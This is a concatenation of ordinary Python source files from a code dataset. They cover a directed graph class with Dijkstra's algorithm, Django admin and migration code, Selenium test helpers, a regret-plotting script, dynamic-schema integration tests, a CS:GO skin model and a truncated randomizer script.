search\n Vertices are picked in ascending order\n \"\"\"\n visited = []\n queue = [v_start]\n if v_start < 0 or v_start > self.v_count - 1:\n return visited\n while queue and v_end not in visited:\n v = queue.pop(0)\n if v not in visited:\n visited.append(v)\n adj = self.adj_matrix[v]\n for x in range(self.v_count):\n if adj[x] > 0 and x not in visited and v_end not in visited:\n queue.append(x)\n return visited\n\n def has_cycle(self):\n \"\"\"\n Return True if graph contains a cycle, False otherwise\n \"\"\"\n visited = []\n stack = []\n for x in range(self.v_count):\n if x not in visited:\n if self.rec_has_cycle(x, visited, stack):\n return True\n return False\n\n def rec_has_cycle(self, v_start, visited, stack):\n \"\"\"\n helper recursive function for has cycle\n \"\"\"\n visited.append(v_start)\n stack.append(v_start)\n adj = self.adj_matrix[v_start]\n\n for x in range(len(adj)):\n if adj[x] > 0 and x not in visited:\n if self.rec_has_cycle(x, visited, stack):\n return True\n elif adj[x] > 0 and x in stack:\n return True\n stack.remove(v_start)\n return False\n\n def dijkstra(self, src: int) -> []:\n \"\"\"\n This method implements Dijkstras algorithm to compute the shortest path rom a given vertex to all other vertices\n in the graph.\n \"\"\"\n vertices = [x for x in range(self.v_count)]\n distance = dict(zip(vertices, [float('inf')] * len(vertices)))\n visited = set()\n priority = [(src, 0)]\n while priority:\n v, d = heapq.heappop(priority)\n if v in visited:\n continue\n visited.add((v, d))\n successors = self.adj_matrix[v]\n for neighbor in range(len(successors)):\n if neighbor == src:\n distance[neighbor] = 0\n if neighbor in visited or successors[neighbor] == 0:\n continue\n di = successors[neighbor]\n di += d\n if di < distance.get(neighbor, float('inf')):\n heapq.heappush(priority, (neighbor, di))\n distance[neighbor] = di\n verts = []\n\n for vert in sorted(distance):\n verts.append(distance[vert])\n return verts\n\nif __name__ == '__main__':\n\n print(\"\\nPDF - method add_vertex() / add_edge example 1\")\n print(\"----------------------------------------------\")\n g = DirectedGraph()\n print(g)\n for _ in range(5):\n g.add_vertex()\n print(g)\n\n edges = [(0, 1, 10), (4, 0, 12), (1, 4, 15), (4, 3, 3),\n (3, 1, 5), (2, 1, 23), (3, 2, 7)]\n for src, dst, weight in edges:\n g.add_edge(src, dst, weight)\n print(g)\n\n\n print(\"\\nPDF - method get_edges() example 1\")\n print(\"----------------------------------\")\n g = DirectedGraph()\n print(g.get_edges(), g.get_vertices(), sep='\\n')\n edges = [(0, 1, 10), (4, 0, 12), (1, 4, 15), (4, 3, 3),\n (3, 1, 5), (2, 1, 23), (3, 2, 7)]\n g = DirectedGraph(edges)\n print(g.get_edges(), g.get_vertices(), sep='\\n')\n\n\n print(\"\\nPDF - method is_valid_path() example 1\")\n print(\"--------------------------------------\")\n edges = [(0, 1, 10), (4, 0, 12), (1, 4, 15), (4, 3, 3),\n (3, 1, 5), (2, 1, 23), (3, 2, 7)]\n g = DirectedGraph(edges)\n test_cases = [[0, 1, 4, 3], [1, 3, 2, 1], [0, 4], [4, 0], [], [2]]\n for path in test_cases:\n print(path, g.is_valid_path(path))\n\n\n print(\"\\nPDF - method dfs() and bfs() example 1\")\n print(\"--------------------------------------\")\n edges = [(0, 1, 10), (4, 0, 12), (1, 4, 15), (4, 3, 3),\n (3, 1, 5), (2, 1, 23), (3, 2, 7)]\n g = DirectedGraph(edges)\n for start in range(5):\n print(f'{start} DFS:{g.dfs(start)} BFS:{g.bfs(start)}')\n\n\n print(\"\\nPDF - method has_cycle() example 1\")\n print(\"----------------------------------\")\n edges = [(0, 1, 10), (4, 0, 12), (1, 4, 15), (4, 3, 3),\n (3, 1, 5), (2, 1, 23), (3, 2, 7)]\n g = DirectedGraph(edges)\n\n edges_to_remove = [(3, 1), (4, 0), (3, 2)]\n for src, dst in edges_to_remove:\n g.remove_edge(src, dst)\n print(g.get_edges(), g.has_cycle(), sep='\\n')\n\n edges_to_add = [(4, 3), (2, 3), (1, 3), (4, 0)]\n for src, dst in edges_to_add:\n g.add_edge(src, dst)\n print(g.get_edges(), g.has_cycle(), sep='\\n')\n print('\\n', g)\n\n\n print(\"\\nPDF - dijkstra() example 1\")\n print(\"--------------------------\")\n edges = [(0, 1, 10), (4, 0, 12), (1, 4, 15), (4, 3, 3),\n (3, 1, 5), (2, 1, 23), (3, 2, 7)]\n g = DirectedGraph(edges)\n for i in range(5):\n print(f'DIJKSTRA {i} {g.dijkstra(i)}')\n g.remove_edge(4, 3)\n print('\\n', g)\n for i in range(5):\n print(f'DIJKSTRA {i} {g.dijkstra(i)}')\n","sub_path":"d_graph.py","file_name":"d_graph.py","file_ext":"py","file_size_in_byte":9584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"355880458","text":"from django.contrib import admin\nfrom base.models import *\nfrom base.forms import AdvancedSearchForm\nfrom django.forms.formsets import formset_factory\nfrom django.db.models import Q\nimport re\nfrom django.forms import Textarea\n\nclass StatusFilter(admin.SimpleListFilter):\n\n title = 'Status'\n \n parameter_name = 'status'\n \n def lookups(self, request, model_admin):\n properties = tuple((prop.id, prop.property) for prop in DescriptiveProperty.objects.all()) \n return properties\n\n def queryset(self, request, queryset):\n if self.value():\n prop_id = self.value()\n return queryset.filter(subjectproperty__property = prop_id)\n\nclass SubjectPropertyInline(admin.TabularInline):\n model = SubjectProperty\n fields = ['property', 'property_value', 'notes', 'last_mod_by']\n readonly_fields = ('last_mod_by',) \n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2, 'cols':40})},\n }\n ordering = ('property__order',)\n suit_classes = 'suit-tab suit-tab-general'\n \n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == 'property':\n kwargs[\"queryset\"] = DescriptiveProperty.objects.filter(Q(primary_type='SO') | Q(primary_type='AL'))\n return super(SubjectPropertyInline, self).formfield_for_foreignkey(db_field, request, **kwargs)\n \nclass MediaSubjectRelationsInline(admin.TabularInline):\n model = MediaSubjectRelations\n fields = ['media', 'relation_type', 'notes', 'last_mod_by']\n readonly_fields = ('last_mod_by',) \n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2, 'cols':40})},\n }\n suit_classes = 'suit-tab suit-tab-general' \n \n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == 'media':\n kwargs[\"queryset\"] = Media.objects.filter(type__type = 'publication')\n return super(MediaSubjectRelationsInline, self).formfield_for_foreignkey(db_field, request, **kwargs)\n \n def get_queryset(self, request):\n qs = super(MediaSubjectRelationsInline, self).get_queryset(request)\n return qs.filter(relation_type=2)\n \nclass SubjectSubjectRelationsInline(admin.TabularInline):\n model = SubjectSubjectRelations\n fk_name = \"subject1\"\n fields = ['subject2', 'relation_type', 'notes', 'last_mod_by']\n readonly_fields = ('last_mod_by',) \n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2, 'cols':40})},\n }\n suit_classes = 'suit-tab suit-tab-general' \n \nclass FileInline(admin.TabularInline):\n model = File\n fields = ['get_thumbnail', 'media', 'relation_type', 'notes', 'last_mod_by']\n readonly_fields = ('get_thumbnail', 'last_mod_by',) \n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2, 'cols':40})},\n }\n suit_classes = 'suit-tab suit-tab-files' \n \n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == 'media':\n kwargs[\"queryset\"] = Media.objects.filter(type__type = 'image/jpeg')\n return super(FileInline, self).formfield_for_foreignkey(db_field, request, **kwargs)\n \nclass SubjectAdmin(admin.ModelAdmin):\n readonly_fields = ('last_mod_by',) \n inlines = [SubjectPropertyInline, MediaSubjectRelationsInline, FileInline]\n search_fields = ['title']\n list_display = ('id1', 'id2', 'id3', 'desc1', 'desc2', 'desc3')\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2, 'cols':40})},\n }\n suit_form_tabs = (('general', 'General'), ('files', 'Files'))\n fieldsets = [\n (None, {\n 'classes': ('suit-tab', 'suit-tab-general'),\n 'fields': ['title', 'notes', 'last_mod_by']\n }),\n ]\n \n change_list_template = 'admin/base/subject/change_list.html'\n change_form_template = 'admin/base/change_form.html'\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n \n def save_formset(self, request, form, formset, change):\n instances = formset.save(commit=False)\n\n for instance in instances:\n if isinstance(instance, SubjectProperty) or isinstance(instance, MediaSubjectRelations): #Check if it is the correct type of inline\n instance.last_mod_by = request.user \n instance.save()\n \n def changelist_view(self, request, extra_context=None):\n extra_context = extra_context or {}\n extra_context['advanced_formset'] = 'test for context'\n return super(SubjectAdmin, self).changelist_view(request, extra_context=extra_context)\n \n def get_search_results(self, request, queryset, search_term):\n '''Override the regular keyword search to perform the advanced search\n \n Because of the modified search_form.html template, the search_term will be specially\n generated to work with this method. Each set of queries is delimited by ??? and takes\n the form [&AND/OR]PROPERTY___SEARCH_TYPE___[SEARCH_KEYWORDS]??? This search method will \n return inaccurate results if someone searches ??? as a keyword\n '''\n queryset, use_distinct = super(SubjectAdmin, self).get_search_results(request, queryset, search_term)\n\n query_rows = search_term.split('???') #list of queries from search_term\n\n # make sure we received list of queries\n if len(query_rows) > 0:\n \n for i, row in enumerate(query_rows):\n \n negate = False # whether the query will be negated\n connector = '' # AND/OR/NOTHING\n kwargs = {}\n current_query = Q()\n \n terms = row.split('___') \n \n if len(terms) >= 3:\n # we got at least the number of terms we need\n\n # CURRENT TERMS FORMAT: ([&AND/OR,] PROPERTY, [not_]SEARCH_TYPE, [SEARCH_KEYWORDS])\n \n # remove and save the operator, if present\n if terms[0].startswith('&'): \n connector = terms[0][1:]\n terms = terms[1:]\n\n # CURRENT TERMS FORMAT: (PROPERTY, [not_]SEARCH_TYPE, [SEARCH_KEYWORDS])\n \n # remove and save the negation, if present\n if terms[1].startswith('not'):\n negate = True\n terms[1] = terms[1][4:]\n\n # CURRENT TERMS FORMAT: (PROPERTY, SEARCH_TYPE, [SEARCH_KEYWORDS])\n \n # if this row is blank, than skip\n if (terms[2] == '') and (terms[1] != 'blank'):\n continue\n \n ########### PROBLEM: THIS IS VERY DEPENDENT ON THE DATA AND UNUM REMAINING AT ID 23\n # if search is for U Number, remove any non-numbers at the beginning\n if terms[0] == '23':\n d = re.search(\"\\d\", terms[2])\n if d is not None:\n start_index = d.start()\n terms[2] = terms[2][start_index:]\n ###########\n \n # create current query\n if terms[1] == 'blank':\n #if property is Any, then return all b/c query asks for doc with 'any' blank properties\n if terms[0] == '0':\n continue\n \n # BLANK is a special case negation (essentially a double negative), so handle differently\n if negate:\n current_query = Q(subjectproperty__property = terms[0])\n else:\n current_query = ~Q(subjectproperty__property = terms[0])\n \n else:\n kwargs = {str('subjectproperty__property_value__%s' % terms[1]) : str('%s' % terms[2])}\n\n # check if a property was selected and build the current query\n if terms[0] == '0':\n # if no property selected, than search thru ALL properties\n # use negation\n if negate:\n current_query = ~Q(**kwargs)\n else:\n current_query = Q(**kwargs)\n else:\n # use negation\n if negate:\n current_query = Q(Q(subjectproperty__property = terms[0]) & ~Q(**kwargs))\n else:\n current_query = Q(Q(subjectproperty__property = terms[0]) & Q(**kwargs))\n \n # modify query set\n if connector == 'AND':\n queryset = queryset.filter(current_query)\n elif connector == 'OR':\n queryset = queryset | self.model.objects.filter(current_query)\n else:\n if i == 0:\n # in this case, current query should be the first query, so no connector\n queryset = self.model.objects.filter(current_query)\n else:\n # if connector wasn't set, use &\n queryset = queryset.filter(current_query)\n \n return queryset.order_by('id').distinct(), use_distinct\n\nadmin.site.register(Subject, SubjectAdmin)\n\nclass MediaPropertyInline(admin.TabularInline):\n model = MediaProperty\n fields = ['property', 'property_value', 'notes', 'last_mod_by']\n readonly_fields = ('last_mod_by',) \n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2, 'cols':40})},\n }\n \n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == \"property\":\n kwargs[\"queryset\"] = DescriptiveProperty.objects.filter(Q(primary_type='MP') | Q(primary_type='AL'))\n return super(MediaPropertyInline, self).formfield_for_foreignkey(db_field, request, **kwargs)\n\nclass MediaAdmin(admin.ModelAdmin):\n readonly_fields = ('created', 'modified', 'last_mod_by')\n fields = ['title', 'type', 'notes', 'created', 'modified', 'last_mod_by']\n list_display = ['title', 'type', 'notes', 'created', 'modified', 'last_mod_by']\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2})},\n }\n inlines = [MediaPropertyInline]\n search_fields = ['title', 'notes']\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n \n def save_formset(self, request, form, formset, change):\n instances = formset.save(commit=False)\n\n for instance in instances:\n if isinstance(instance, MediaProperty) : #Check if it is the correct type of inline\n instance.last_mod_by = request.user \n instance.save()\n \nadmin.site.register(Media, MediaAdmin)\n\nclass PersonOrgPropertyInline(admin.TabularInline):\n model = PersonOrgProperty\n extra = 3\n fields = ['property', 'property_value', 'last_mod_by']\n\nclass PersonOrgAdmin(admin.ModelAdmin):\n fields = ['title', 'notes', 'last_mod_by']\n inlines = [PersonOrgPropertyInline]\n search_fields = ['title']\n\nadmin.site.register(PersonOrg, PersonOrgAdmin)\n\nadmin.site.register(GlobalVars)\nadmin.site.register(MediaType)\n\nclass DescriptivePropertyAdmin(admin.ModelAdmin):\n readonly_fields = ('created', 'modified', 'last_mod_by')\n fields = ['property', 'primary_type', 'order', 'visible', 'notes', 'created', 'modified', 'last_mod_by']\n list_display = ['property', 'primary_type', 'order', 'visible', 'notes', 'created', 'modified', 'last_mod_by']\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2})},\n }\n search_fields = ['property']\n list_filter = ('primary_type', 'visible')\n list_editable = ('primary_type', 'order', 'visible', 'notes')\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n\nadmin.site.register(DescriptiveProperty, DescriptivePropertyAdmin)\nadmin.site.register(MediaProperty)\nadmin.site.register(FeaturedImgs)\n\nclass SubjectPropertyAdmin(admin.ModelAdmin):\n readonly_fields = ('created', 'modified', 'last_mod_by')\n fields = ['subject', 'property', 'property_value', 'notes', 'created', 'modified', 'last_mod_by']\n list_display = ['subject', 'property', 'property_value', 'notes', 'created', 'modified', 'last_mod_by']\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2})},\n }\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n\nadmin.site.register(SubjectProperty, SubjectPropertyAdmin)\nadmin.site.register(ResultProperty)\nadmin.site.register(Relations)\n\nclass MediaSubjectRelationsAdmin(admin.ModelAdmin):\n readonly_fields = ('created', 'modified', 'last_mod_by')\n fields = ['media', 'subject', 'relation_type', 'notes', 'created', 'modified', 'last_mod_by']\n list_display = ['media', 'subject', 'relation_type', 'notes', 'created', 'modified', 'last_mod_by']\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2})},\n }\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n\nadmin.site.register(MediaSubjectRelations, MediaSubjectRelationsAdmin)\n\nclass SubjectSubjectRelationsAdmin(admin.ModelAdmin):\n readonly_fields = ('created', 'modified', 'last_mod_by')\n fields = ['subject1', 'subject2', 'relation_type', 'notes', 'created', 'modified', 'last_mod_by']\n list_display = ['subject1', 'subject2', 'relation_type', 'notes', 'created', 'modified', 'last_mod_by']\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2})},\n }\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n\nadmin.site.register(SubjectSubjectRelations, SubjectSubjectRelationsAdmin)\nadmin.site.register(MediaPersonOrgRelations)\nadmin.site.register(PersonOrgProperty)\n\nclass StatusAdmin(admin.ModelAdmin):\n readonly_fields = ('created', 'modified', 'last_mod_by')\n fields = ['status', 'notes', 'created', 'modified', 'last_mod_by']\n list_display = ['status', 'notes', 'created', 'modified', 'last_mod_by']\n formfield_overrides = {\n models.TextField: {'widget': Textarea(attrs={'rows':2})},\n }\n \n def save_model(self, request, obj, form, change):\n obj.last_mod_by = request.user\n obj.save()\n \nadmin.site.register(Status, StatusAdmin)","sub_path":"base/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":15253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"54593313","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/5/28 20:37\n# @Author : sunlin\n# @File : page.py\n# @Software: PyCharm\nimport datetime\nimport random\nimport string\nfrom selenium.common.exceptions import TimeoutException, NoSuchElementException\n\nfrom datetime import date, timedelta\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\ndef get_element(driver, loc):\n # ele = WebDriverWait(driver, 30).until(lambda x: x.find_element(*loc), message=\"没有找到元素\")\n # return ele\n try:\n WebDriverWait(driver, 30).until(EC.visibility_of_element_located(loc), message=\"not found element %s By %s \" % loc[::-1])\n return driver.find_element(*loc)\n except TimeoutException as msg:\n print(msg)\n # driver.close()\n\n\ndef get_phone():\n num_start = ['130', '131', '132', '135', '150', '152', '156', '185', '186', '138', '137', '187', '188', '180',\n '139']\n start = random.choice(num_start)\n end = ''.join(random.sample(string.digits, 8))\n res = start + end\n return res\n\n\ndef get_phone2():\n num_start = [\"4\", \"5\", \"6\", \"8\", \"9\"]\n start = random.choice(num_start)\n end = ''.join(random.sample(string.digits, 7))\n res = start + end\n return res\n\ndef get_phone3():\n # num_start = [\"4\", \"5\", \"6\", \"8\", \"9\"]\n # start = random.choice(num_start)\n end = ''.join(random.sample(string.digits, 7))\n res = end\n return res\n\n\n\ndef get_alert(driver):\n WebDriverWait(driver, 10, 0.5).until(EC.alert_is_present())\n a = driver.switch_to.alert\n msg = a.text\n print(msg)\n a.accept()\n return msg\n\n\ndef get_ID():\n # num_start = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"k\", \"P\", \"R\", \"S\", \"V\"]\n num_start = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"k\", \"P\", \"R\", \"S\", \"V\"]\n start = random.choice(num_start)\n end = ''.join(random.sample(string.digits, 6))\n end2 = ''.join(random.sample(string.digits, 1))\n num_end = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n end2 = random.choice(num_end)\n res = start + end + \"(\"+end2 +\")\"\n return res\n\n\ndef get_date(days=7):\n # 获取7天后的日期, days为具体几天后的日期\n data = (date.today() + timedelta(days=days)).strftime(\"%Y-%m-%d\")\n return data\n\n\ndef get_date2(days=7):\n # 获取7天后的日期, days为具体几天后的日期\n data = (date.today() + timedelta(days=days)).strftime(\"%Y-%m-%d %H:%M:%S\")\n return data\n\n\ndef runtime(func):\n def wrapper(*args):\n try:\n starttime = datetime.datetime.now()\n result = func(*args)\n endtime = datetime.datetime.now()\n run_time = (endtime - starttime).seconds\n print(\"程序运行的时间为:\" + str(run_time) + '秒')\n return result\n except Exception as msg:\n print(msg)\n\n return wrapper\n\n\nif __name__ == '__main__':\n # print(get_phone())\n # print(type(get_date()))\n # print(get_date2())\n ss = ''.join(random.sample(string.digits, 4))\n name1 = \"WDYQ\" + ''.join(random.sample(string.digits, 4))\n print(name1)\n print(type(ss))\n print(get_ID())\n","sub_path":"houtai/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"71526170","text":"# !/usr/bin/env python\n# coding: utf-8\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as ss\n\n\n# Getting Average regret and Confidence interval\ndef accumulative_regret_error(regret):\n time_horizon = [0]\n samples = len(regret[0])\n runs = len(regret)\n batch = samples / 10\n\n # Time horizon\n t = 0\n while True:\n t += 1\n if time_horizon[-1] + batch > samples:\n if time_horizon[-1] != samples:\n time_horizon.append(time_horizon[-1] + samples % batch)\n break\n time_horizon.append(time_horizon[-1] + batch)\n\n # Mean batch regret of R runs\n avg_batched_regret = []\n for r in range(runs):\n count = 0\n accumulative_regret = 0\n batch_regret = [0]\n for s in range(samples):\n count += 1\n accumulative_regret += regret[r][s]\n if count == batch:\n batch_regret.append(accumulative_regret)\n count = 0\n\n if samples % batch != 0:\n batch_regret.append(accumulative_regret)\n avg_batched_regret.append(batch_regret)\n\n regret = np.mean(avg_batched_regret, axis=0)\n\n # Confidence interval\n conf_regret = []\n freedom_degree = runs - 2\n for r in range(len(avg_batched_regret[0])):\n conf_regret.append(ss.t.ppf(0.95, freedom_degree) * ss.sem(np.array(avg_batched_regret)[:, r]))\n return time_horizon, regret, conf_regret\n\n\n# Regret Plotting\ndef regret_plotting(regret, classifier_count, data_points):\n colors = list(\"rgbcmyk\")\n # shape = ['--H', '--d', '--X', '--^', '--v', '--*', '--+']\n shape = ['--^', '--d', '--v']\n\n # Scatter Error bar with scatter plot\n for a in range(len(classifier_count)):\n horizon, batched_regret, error = accumulative_regret_error(np.array(regret[a]))\n plt.errorbar(horizon, batched_regret, error, color=colors[a])\n plt.plot(horizon, batched_regret, colors[a] + shape[a], label='K=' + str(classifier_count[a]))\n\n # Location of the legend\n plt.legend(loc='upper left', numpoints=1)\n # plt.title(\"Cumulative Regret for different numbers of classifiers for \" + str(data_points) + \" samples\")\n plt.ylabel(\"Cumulative Regret\")\n plt.xlabel(\"Number of Samples\")\n plt.savefig(\"output/final_plot/simple_\" + str(data_points) + \".png\", bbox_inches='tight')\n plt.close()\n\n\n# Reading Data\n# data_plot = [1000, 5000, 10000, 25000, 50000, 100000]\ndata_plot = [5000, 50000]\nclassifiers_count = [2, 3, 5]\n# classifiers_count = [2]\nruns = 20\n\n# Reading Files\nfor d in range(len(data_plot)):\n classifiers_regret = []\n for c in classifiers_count:\n fileName = \"output/regretFiles/2d/\" + str(data_plot[d]) + \"_\" + str(c) + \".txt\"\n resultFile = open(fileName)\n classifier_regret = []\n for r in range(runs):\n regrets = map(float, list(resultFile.readline().split(\"[\")[1].split(\"]\")[0].split(\", \")))\n classifier_regret.append(regrets)\n classifiers_regret.append(classifier_regret)\n resultFile.close()\n\n regret_plotting(classifiers_regret, classifiers_count, data_plot[d])\n","sub_path":"plottingSynthetic1.py","file_name":"plottingSynthetic1.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"348652351","text":"from common_fixtures import * # NOQA\nfrom gdapi import ApiError\nfrom test_authorization import user_client # NOQA\nfrom test_authorization import service_client # NOQA\nfrom test_authorization import project_client # NOQA\n\nDEFINITION = '''\n {\n \"resourceFields\": {\n \"fooBar\": {\n \"type\": \"string\",\n \"description\": \"foo animal\"\n }\n }\n }\n '''\n\n\ndef test_schema_lifecycle(context, client, service_client): # NOQA\n schema = random_str() + 'Config'\n got_schema = client.by_id_schema(schema)\n assert got_schema is None\n\n made_schema = service_client.create_dynamic_schema(\n accountId=context.project.id,\n name=schema,\n parent='service',\n definition=DEFINITION,\n roles=[\"project\", \"owner\", \"member\"])\n\n service_client.wait_success(made_schema)\n\n got_schema = client.by_id_schema(schema)\n assert got_schema is not None\n\n assert got_schema.resourceFields.fooBar.type == 'string'\n assert got_schema.resourceFields.fooBar.description == 'foo animal'\n\n made_schema = service_client.reload(made_schema)\n made_schema.remove()\n service_client.wait_success(made_schema)\n\n got_schema = client.by_id_schema(schema)\n assert got_schema is None\n\n\ndef test_invalid_schema_definition(context, client, service_client): # NOQA\n with pytest.raises(ApiError) as e:\n service_client.create_dynamic_schema(\n accountId=context.project.id,\n name=random_str(),\n parent='service',\n definition='{\"fsadfasd\":\"fasdfdsf\",}',\n roles=[\"project\", \"owner\", \"member\"])\n assert e.value.error.status == 422\n assert e.value.error.fieldName == 'definition'\n\n\ndef test_schema_roles(service_client, user_client, project_client): # NOQA\n schema = random_str()\n got_schema = project_client.by_id_schema(schema)\n assert got_schema is None\n\n made_schema = service_client.create_dynamic_schema(\n name=schema,\n parent='baseMachineConfig',\n definition='''\n {\n \"resourceFields\": {\n \"fooBar\": {\n \"type\": \"string\",\n \"description\": \"foo animal\"\n }\n }\n }\n ''',\n roles=[\"project\"])\n\n service_client.wait_success(made_schema)\n\n project_client.reload_schema()\n\n auth_check(project_client.schema, schema, 'r', {\n 'fooBar': 'r'\n })\n\n made_schema = service_client.reload(made_schema)\n made_schema.remove()\n service_client.wait_success(made_schema)\n\n got_schema = project_client.by_id_schema(schema)\n assert got_schema is None\n\n made_schema2 = service_client.create_dynamic_schema(\n name=schema,\n parent='baseMachineConfig',\n definition='''\n {\n \"resourceMethods\" : [\"GET\", \"PUT\", \"DELETE\"],\n \"collectionMethods\" : [ \"GET\", \"POST\" ],\n \"resourceFields\": {\n \"fooBar\": {\n \"type\": \"string\",\n \"description\": \"foo animal\",\n \"create\": true,\n \"update\": true\n }\n }\n }\n ''',\n roles=[\"user\"])\n\n service_client.wait_success(made_schema2)\n\n user_client.reload_schema()\n\n auth_check(user_client.schema, schema, 'crud', {\n 'fooBar': 'cru'\n })\n\n made_schema2 = service_client.reload(made_schema2)\n made_schema2.remove()\n service_client.wait_success(made_schema2)\n\n got_schema = user_client.by_id_schema(schema)\n assert got_schema is None\n","sub_path":"tests/integration/cattletest/core/test_dynamic_schema.py","file_name":"test_dynamic_schema.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"4972672","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('web', '0003_auto_20141005_1317'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Associado',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Evento',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('data', models.DateTimeField(verbose_name=b'data de ocorrencia')),\n ('descricao', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Paciente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('usuario', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='evento',\n name='paciente',\n field=models.ForeignKey(to='web.Paciente'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='associado',\n name='paciente',\n field=models.ForeignKey(to='web.Paciente'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='associado',\n name='usuario',\n field=models.OneToOneField(to=settings.AUTH_USER_MODEL),\n preserve_default=True,\n ),\n ]\n","sub_path":"web/migrations/0004_auto_20141005_1320.py","file_name":"0004_auto_20141005_1320.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"347946090","text":"# -*- coding: utf-8 -*-\n\nfrom ...init import db\nfrom ..enums import Apps\nfrom ..skins import Skin as BaseSkin\nfrom .enums import Rarities, Qualities, Categories\nfrom .weapons import Weapon\n\n\nclass Skin(BaseSkin):\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.app = Apps.csgo\n\n weapon = db.ReferenceField(Weapon, required=True)\n\n stat_trak = db.BooleanField(required=True)\n souvenir = db.BooleanField(required=True)\n _quality = db.IntField(db_field=\"quality\", required=True)\n _rarity = db.StringField(db_field=\"rarity\", choices=Rarities)\n\n meta = {\n 'indexes': ['stat_trak', 'souvenir', '_quality', '_rarity']\n }\n\n @property\n def fullname(self):\n res = \"\"\n if self.stat_trak:\n res += \"StatTrak \"\n res += self.weapon.pk\n if self.souvenir:\n res += \" (Souvenir)\"\n res += \" | \" + self.name + \" \"\n res += \"(\" + self.quality.value + \")\"\n return res\n\n @property\n def market_hash_name(self):\n res = ''\n if self.weapon.category == Categories.knives:\n res += '★ '\n if self.souvenir:\n res += 'Souvenir '\n elif self.stat_trak:\n res += 'StatTrak™ '\n res += self.weapon.name.value + \" | \" + self.name\n return res\n\n @property\n def quality(self):\n return Qualities.from_int(self._quality)\n\n @quality.setter\n def quality(self, value):\n self._quality = value.to_int()\n\n @property\n def rarity(self):\n try:\n return Rarities[self._rarity]\n except KeyError:\n return None\n\n @rarity.setter\n def rarity(self, value):\n self._rarity = value.name\n\n @classmethod\n def _parse_kwargs(cls, kwargs):\n if 'quality' in kwargs:\n try:\n kwargs['_quality'] = kwargs.pop('quality').to_int()\n except AttributeError:\n pass\n return super()._parse_kwargs(kwargs)\n","sub_path":"backend/src/models/csgo/skins.py","file_name":"skins.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"195057455","text":"from openpyxl import Workbook\nfrom datetime import datetime\nfrom sys import exit\nfrom os import system\nfrom random import uniform # returns floating-point value, use randint for integer value\nXLSX_Worker = Workbook()\nActive_XLSX = XLSX_Worker.active\nDatetime_Create = datetime.now()\n\nclass Randomize_App:\n def __init__(self, start_int, end_int, result, attempts):\n self.start_int = start_int\n self.end_int = end_int\n self.result = result\n self.attempts = attempts\n\n def Welcome_Intro(self):\n system(\"CLS\")\n print(\"Hello and Welcome To Randomize Cutout Generator\")\n print(\"Exclusively Created for EDA which uses bond paper to do data.\")\n print(\"Data will be automatically added to Excel... Choice the 